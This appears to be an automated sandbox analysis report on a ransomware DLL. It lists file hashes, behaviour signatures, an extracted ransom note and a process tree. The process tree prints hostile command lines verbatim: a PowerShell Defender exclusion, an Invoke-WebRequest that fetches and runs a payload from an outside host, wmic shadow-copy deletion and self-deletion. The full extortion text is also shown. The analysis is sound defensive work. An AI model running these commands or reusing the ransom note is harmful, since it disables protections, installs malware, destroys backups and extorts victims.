Analysis

  • max time kernel
    94s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-12-2024 02:15

General

  • Target

    4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e.dll

  • Size

    206KB

  • MD5

    fccd129f6a5b9d2133d14922a3614f02

  • SHA1

    e814c637e6f0c21f3aa9b43fb92cb161b4d451fc

  • SHA256

    4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e

  • SHA512

    c1594504053bbe2b061880d1ff69819eca8bdd2bc882b74f415ff8a1515389e32b8d7cd1b931d65b042247fd05df1751a000d6da4219427b74e9cdb0e0e52979

  • SSDEEP

    3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt

Ransom Note
ATTENTION! Don't worry, you can return your files! All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and your key. Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours. Contact us email :[email protected] -> [email protected] Attach this file in the email. ID :061BA3329590C150DF53FAE25770682AD38ABDE3D21BCF9A5E0633657F7CBE4089C4503BDDE62DCC1D25E2E10EF57100CBD307F3C867C8030B3E7027259875C544BAE2B18B4105D96E8B39E6C7A4A7C523E2272D2C44FAD3814A568100E7B6F68BB72CF4CA65B9CC7BBB028064A4EC746A3C6AE949D1CA05627B200745608EFDE9BDEBDE99F7DCDE28F67A76805B19F8A606990BAA44508E7603A31B12AEB883461AF5690542BA1F68A3CBF7DBB88F04A2E26CCA981818DEAC16402C23F65DF082045EF161E7812C2F5F038933558FA93B29C11A81196088BBDCF2988206F5A9979CDB99634AD1E8783D15F8F9EA42C9936045F8D907ABDD89CA8318B0650958651B592AA820A9772B5438875BB301283FD5E28BF699C8D5EE7E7EA366516F1AD8E4ACA4D0358A2EC06AC158C688A53375E2B284945A53C96C4FA6D344346C0805FE45F1B604BC34695962910424F06435D977379666C55365AF79F280201E4CE728C5ED0293103C32F14169DC4F1CF554AFD84B1B498607DB1BEC8F7DC1A8CDC129A973EAF2CE2E28E36DFE815199DE1A495EB5BAB775F366A6FFA5C9EE4842915287A4AE21F34A08A9A9C8287201754CDD2747FF3CBE410A631B50BA2E803CC8095202171108B47ED0446A11D1E8DE62ED4BFF8611DB5A830DCE48E9FD6B71F33770795518634D6E28C2227CE949410301FB76D666AEB3839BFC758505184600C1D46C1AA4DD335D39F5F6E0B586458CCB51A51BD9A29F9ACA9EE10AFD2E25A43AC0033DA9B34468F3EF00915F61B0D54EF9AC1E51F0E1A8526EC3855BD2CE9F6C604BA8D89609C2B2DD593D482F5184F820688F2A3C6D49EB807EEBFC415E5D789F0C8B2EECB961EF403619BF7A61D23BB6E281D8C0BE135397B2F130971BB4174D85B51FB442004019821559137B54B20BDF087E14F837890F72824FECA3D44755FC0FA2880829EE59735226C02D950FB24FABB5592DCE00F2352054041BE61993F0AA6161DE72436F238AAE4BFB5A673D709D66E7BA548A1E3FF7701C8B886806BC284BC5FFD9D33166B4B3ABDE7C5287B1206637AD610ED62D34836E54A8FF39E2E94642C147E9EC5439DEDAC174F767E0AB4281A596BC481E58E9B9FD1429AFEC7AE2A9E102DE3C6B1898F02CE9BB029E1DC6F57031334A85917B912BAAD45970AFE5A6629F3C70E0B94FC6AE1CC3F734F30DB74DDD513AED50A1CD0635A94847D271BFF29254AAE9097E4C2F5A2A018AB6858A93A92AB25E65874129AF6F0422D09D92A662B6761BF3C33D7CC6155A096FF8986AC650F44B8E0778C06675369E42A8EA9F3BB11F06A02F6425411383EF61158C49B5D8C42389CCC1D4456C66BA7F1840C2AE5967AC0F6A44F2590269CC6C55937B3F003A54EE5F71E9B625639AA28AB0F723A3C6FAA7F0E291CD38915B1D21BC24027E87768DE1D68BA9950279BA47552052EF09205961EC4092321EEB4F56B89CF0B85226FDBD5A47C86C11773C9DDD2585480E08581C6E202BDEADFF92458980C5B453496B15772B810633478037501D1E8D7475F4DEE4081DE6FF9A61C662BA7CE286CA79328921E9E381BFF4F1F5AD3A925B52D41A65BF62441FCA39EBACFF0E13AA0854AE1FE008BF957E28BDB1BC2742244365EA3DB33BC939BC71D82CF282CE65E9D8484C7B99BD22489AFA7B9AB414AB74AEC9432FD55CAEF203D22ECB5D506BC32BE38F69B6074DE32F8FF597F98CE0BDE1E93123D344AA045C080866AC711274758ABC19E0B1FF12E08B6B7668385409E167E0B37773EB77E02DFF8A5FCCD4E826069F127AAB34E89C9CE26DD6453228DE1C5B68412DF9F87F67DE21FF827E5409A0A123ECB29FF33765B4CB1239C9DC9623E490C49D67A17C4FBF73F00706BB4A4C23A59AAF8330FE25B7E778B0FF3ED04FE72AA1371BF6770E9EB4F68A48DE79D9AEAAD7AA1AD22FCC50172B017B5C9783AACF1A2851F23EE9D3B4F8979F17026763274750F23BBF8719DFA535E786157DBA9CAFE160E52B31685EAA554CC45E73B25C3AA9EA54181202607D94BB3F340158C439523B7C4AA8D30ACF27F0B384875A3DA0937D52FD2EDF567E19081F7B2AFBCE1653B4F224128797B469259D9DC3C3BBE5D968EC2823F5DE9FD39A37E74227FE440CDAF0FF98E495175FB8926C0E78411D2E1FE3D74A6D526B775143E2764891E2607F126A3F808F9325A07A12ABACFF86420B0D730526D115F5C1A266403317AAF8F63306E5EDFD54A1DB85C65D711CCD97A71DDF2A47F9C891F21CA9A91F6D80297B5BABAF9BEF94DF6DC5C65E32D287CEBD829FCC8ECEDE19535E55F69D3D0CD71643FED484AC10EDBFC01C8C71132829F1FE2C59035E2850AE

Signatures

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e.dll,#1
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2992
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4276
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3508
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4896
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2088
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c %temp%/eryy65ty.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4440
        • C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe
          C:\Users\Admin\AppData\Local\Temp/eryy65ty.exe
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops desktop.ini file(s)
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4628
          • \??\c:\Windows\system32\wbem\wmic.exe
            c:\orCyeK\orCy\..\..\Windows\orCy\orCy\..\..\system32\orCy\orCy\..\..\wbem\orCy\orCye\..\..\wmic.exe shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:384
          • \??\c:\Windows\system32\wbem\wmic.exe
            c:\Jzfcwm\Jzfc\..\..\Windows\Jzfc\Jzfc\..\..\system32\Jzfc\Jzfc\..\..\wbem\Jzfc\Jzfcw\..\..\wmic.exe shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3472
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:3172
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:3680
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4244

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    16KB

    MD5

    df8c2eaab985a4626b70e616393231ab

    SHA1

    cecd5406b7228e7a4ad8f5ae5bb0b4d35660650e

    SHA256

    91aa8dfd4fc80fbdfdbec4cf4c1c34a7c11ba9f7ec42128281e693b6fac0e57d

    SHA512

    5107f0ffffe635f47e38fc69ed7735449dc17e62d8324976cb9cddcf55cdb280612c7bb9a301943e0c85dbcbc68eb48070473339d11bcd9aa64457b4ccd9e488

  • C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt

    Filesize

    4KB

    MD5

    b61f3c2c0afa312305ae44c8d80e74ac

    SHA1

    71fcecee50feb64b8ff0c85f2f847becd3d4a92f

    SHA256

    8fc06633bfc50b7b25b34a4b9b18656478a1d8cb255505b1a59b7e2f4873af4a

    SHA512

    8da387384b15cb174083dfc1ac5632396f55491f46fe100e3c7e388610bfe57bd19c8bbef79a707d5e3a166815d612be63b68f6bb589183c932a021161cea57b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rdwc0vjw.o5u.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe

    Filesize

    881KB

    MD5

    9049faba5517305c44bd5f28398fb6b9

    SHA1

    036c6b32f3e7d7d689c9b4d482091eebcc669bfa

    SHA256

    d2100ffe58eb50c05d97a3da738ccd1f0be9672c057c26a10140af80595b78c3

    SHA512

    65a33506f970675775468f80b94a3f8bb2d3672e6fb08fc9f2e5107020095ca6d4bca927c59b72488e2ef4208a64a56ced7511ea14c0445cd50ea3ff9b827f6a

  • memory/2088-49-0x0000000005B20000-0x0000000005E74000-memory.dmp

    Filesize

    3.3MB

  • memory/3508-19-0x0000000007140000-0x0000000007172000-memory.dmp

    Filesize

    200KB

  • memory/3508-35-0x0000000007BC0000-0x000000000823A000-memory.dmp

    Filesize

    6.5MB

  • memory/3508-16-0x0000000005B70000-0x0000000005EC4000-memory.dmp

    Filesize

    3.3MB

  • memory/3508-17-0x0000000006170000-0x000000000618E000-memory.dmp

    Filesize

    120KB

  • memory/3508-18-0x00000000061C0000-0x000000000620C000-memory.dmp

    Filesize

    304KB

  • memory/3508-21-0x00000000704C0000-0x000000007050C000-memory.dmp

    Filesize

    304KB

  • memory/3508-31-0x00000000746A0000-0x0000000074E50000-memory.dmp

    Filesize

    7.7MB

  • memory/3508-32-0x0000000006730000-0x000000000674E000-memory.dmp

    Filesize

    120KB

  • memory/3508-33-0x00000000746A0000-0x0000000074E50000-memory.dmp

    Filesize

    7.7MB

  • memory/3508-20-0x00000000746A0000-0x0000000074E50000-memory.dmp

    Filesize

    7.7MB

  • memory/3508-0-0x00000000746AE000-0x00000000746AF000-memory.dmp

    Filesize

    4KB

  • memory/3508-34-0x0000000007180000-0x0000000007223000-memory.dmp

    Filesize

    652KB

  • memory/3508-36-0x00000000072B0000-0x00000000072CA000-memory.dmp

    Filesize

    104KB

  • memory/3508-6-0x0000000005A10000-0x0000000005A76000-memory.dmp

    Filesize

    408KB

  • memory/3508-37-0x0000000007310000-0x000000000731A000-memory.dmp

    Filesize

    40KB

  • memory/3508-38-0x0000000007720000-0x00000000077B6000-memory.dmp

    Filesize

    600KB

  • memory/3508-39-0x00000000076B0000-0x00000000076C1000-memory.dmp

    Filesize

    68KB

  • memory/3508-40-0x00000000076E0000-0x00000000076EE000-memory.dmp

    Filesize

    56KB

  • memory/3508-41-0x00000000076F0000-0x0000000007704000-memory.dmp

    Filesize

    80KB

  • memory/3508-42-0x00000000077E0000-0x00000000077FA000-memory.dmp

    Filesize

    104KB

  • memory/3508-43-0x00000000077C0000-0x00000000077C8000-memory.dmp

    Filesize

    32KB

  • memory/3508-46-0x00000000746A0000-0x0000000074E50000-memory.dmp

    Filesize

    7.7MB

  • memory/3508-5-0x00000000059A0000-0x0000000005A06000-memory.dmp

    Filesize

    408KB

  • memory/3508-4-0x00000000052A0000-0x00000000052C2000-memory.dmp

    Filesize

    136KB

  • memory/3508-2-0x00000000746A0000-0x0000000074E50000-memory.dmp

    Filesize

    7.7MB

  • memory/3508-3-0x0000000005300000-0x0000000005928000-memory.dmp

    Filesize

    6.2MB

  • memory/3508-1-0x0000000002B90000-0x0000000002BC6000-memory.dmp

    Filesize

    216KB